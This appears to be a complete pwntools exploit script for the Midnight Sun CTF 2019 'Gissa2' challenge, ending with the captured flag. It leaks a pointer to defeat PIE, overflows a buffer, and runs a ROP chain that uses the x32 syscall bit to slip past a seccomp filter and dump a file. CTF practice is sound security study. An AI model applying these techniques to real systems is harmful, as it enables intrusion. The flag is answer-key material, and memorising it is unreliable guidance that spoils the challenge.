Midnight Sun CTF 2019 Quals Gissa2
#!/usr/bin/env python
from pwn import *
# gdb (opt 'd'/'a') opens in a horizontal tmux split; the commented-out
# alternative uses a fresh tmux window instead.
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
#context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')   # not needed: the chain further down is pure-syscall ROP
elf = ELF('./gissa_igen')
# Take the architecture from the target itself so p16/p64/asm match the binary.
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log: every byte sent/received
# Connection targets: 'r' -> remote CTF box, 'l' -> something listening locally.
RHOST, RPORT = "gissa-igen-01.play.midnightsunctf.se", 4096
LHOST, LPORT = "127.0.0.1", 4096
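def section_addr(name, elf=elf):
    """Return the load address (sh_addr) of ELF section `name`.

    `elf` defaults to the target binary loaded above.  get_section_by_name()
    returns None for an unknown section name; the original `None.header`
    access then died with an unhelpful AttributeError, so that case is turned
    into a ValueError naming the missing section.
    """
    section = elf.get_section_by_name(name)
    if section is None:
        raise ValueError("no section named %r in the target ELF" % (name,))
    return section.header['sh_addr']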
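def dbg(ss):
    """Log `ss` and its value as hex, e.g. dbg('bin_base') -> "bin_base: 0x55...".

    `ss` is first looked up as a plain name in the caller's locals, then its
    globals, so the helper also works for locals when called from inside a
    function (the original eval() only ever saw this module's globals).  Only
    when `ss` is not a bare name is it evaluated as an expression -- still via
    eval(), which is tolerable here solely because every call site passes a
    hard-coded string from this script.  Never feed it attacker-controlled
    text such as data received from the target.
    """
    import inspect
    missing = object()
    frame = inspect.currentframe().f_back
    try:
        value = frame.f_locals.get(ss, frame.f_globals.get(ss, missing))
        if value is missing:
            # Not a simple name: fall back to evaluating in the caller's scope.
            value = eval(ss, frame.f_globals, frame.f_locals)
    finally:
        del frame  # break the frame reference cycle (inspect docs recommend it)
    log.info("%s: 0x%x" % (ss, value))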
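conn = None
# First CLI argument selects the target: 'r' = remote box, 'l' = local
# listener, 'd' = run under gdb, 'a' = spawn a process and attach gdb to it;
# anything else (or no argument) = plain local process.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
# Tuple membership, not a substring test: `opt in 'rl'` was also true for ''
# and 'rl', which then crashed on the dict lookup below with a KeyError.
if opt in ('r', 'l'):
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    # Just run; add e.g. "break *%#x" % elf.symbols['main'] (or elf.entrypoint
    # when the binary is stripped) to single-step the ROP chain.  The old
    # .format() call here had no placeholder and was dead code.
    gdbscript = """
continue
"""
    conn = gdb.debug(['./gissa_igen'], gdbscript=gdbscript)
else:
    conn = process(['./gissa_igen'])
    # conn = process(['./gissa_igen'], env={'LD_PRELOAD': ''})
    if opt == 'a':
        gdb.attach(conn)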
def none_input():
    """Wait for the next ':' prompt and answer it with an empty line."""
    conn.recvuntil(':')
    conn.sendline('')
# exploit
log.info('Pwning')
# First prompt: answered with an empty line.
none_input()
# Second answer: 0x8c bytes of filler, then two 16-bit fields and two 64-bit
# markers at offset 0x8c.  What the program does with the 0xa8/0 pair is not
# visible here; it is inferred from the third payload (same layout, larger
# values) and the 0xa8 return-address offset used at the end.  Total length 0xa0.
payload = 'x'*(0xa8-0x1c) + p16(0xa8) + p16(0x0000) + p64(0xdeaddeaddeaddead) + p64(0x8fffffff44434241)
print hex(len(payload))  # 0xa0 = 0x8c + 2 + 2 + 8 + 8
conn.sendlineafter(':', payload)
# Third answer: same layout with 0x1010/0x7ff0 in the 16-bit fields and an
# 8-byte 'z' marker at the end (0xa8 bytes in total).  Sent without a newline:
# whatever the program echoes right after the marker is the leak.
payload = 'x'*(0xa8-0x1c) + p16(0x1010) + p16(0x7ff0) + p64(0xdeaddeaddeaddead) + p64(0x8fffffff44434241) + 'z'*8
conn.sendafter(':', payload)
conn.recvuntil('z'*8)
# The 6 bytes after the marker are a code pointer (x86-64 user-space pointers
# have their top two bytes zero, hence the padding); subtracting its offset
# inside the binary (0xbc5) yields the PIE base.
bin_base = u64(conn.recv(6) + '\x00'*2) - 0xbc5
dbg('bin_base')
'''
0x00000c21: pop rax ; pop rdi ; pop rsi ; ret ; (1 found)
0x00000c1d: pop rdx ; pop r9 ; pop r8 ; pop rdi ; pop rsi ; ret ; (1 found)
0x00000bd9: syscall ; ret ; (11 found)
'''
# Gadget offsets from the listing above, rebased on the leaked PIE base.
pop_rax_rdi_rsi = bin_base + 0x00000c21
pop_rdx_pop_4 = bin_base + 0x00000c1d
syscall = bin_base + 0x00000bd9
read_n = bin_base + 0x88B  # not used by the chain below
# Scratch buffer for the file contents; 0x202000 is presumably in the
# binary's writable data segment -- not verified here.
writable = bin_base + 0x202000
none_input()
# Pure-syscall ROP chain (no libc address needed):
#   open(bin_base+0x1585, O_RDONLY)  rax = 2 | 0x40000000.  Bit 30 is the x32
#       ABI syscall bit; on kernels with x32 enabled nr 0x40000002 is still
#       open, while a hand-written seccomp filter that only compares the nr
#       with 2 does not match it.  The flag text ("should have used libseccomp",
#       which rejects x32 numbers by default) suggests that is the intended
#       bypass -- confirm against the binary's filter.  0x1585 is presumably a
#       path string inside the binary; not visible here.
#   read(3, writable, 0x100)          assumes fd 3 is the first free descriptor
#   write(1, writable, 0x100)         dump it to stdout
# pop_rdx_pop_4 also pops r9/r8/rdi/rsi, so it always runs first and
# pop_rax_rdi_rsi then sets the real rdi/rsi afterwards.
rop = ''
rop += p64(pop_rdx_pop_4) + p64(0)*5 + p64(pop_rax_rdi_rsi) + p64(0x40000000+2) + p64(bin_base+0x1585) + p64(0) + p64(syscall)
rop += p64(pop_rdx_pop_4) + p64(0x100)*5 + p64(pop_rax_rdi_rsi) + p64(0) + p64(3) + p64(writable) + p64(syscall)
rop += p64(pop_rdx_pop_4) + p64(0x100)*5 + p64(pop_rax_rdi_rsi) + p64(1) + p64(1) + p64(writable) + p64(syscall) + p64(0xbad)
# 0xa8 bytes of filler reach the saved return address; the chain ends in 0xbad,
# so the process crashes after the write() -- acceptable, the data is already
# on stdout.
payload = 'z'*0xa8 + rop
conn.sendlineafter(':', payload)
conn.interactive()
# midnight{I_kN3w_1_5H0ulD_h4v3_jUst_uS3d_l1B5eCC0mP}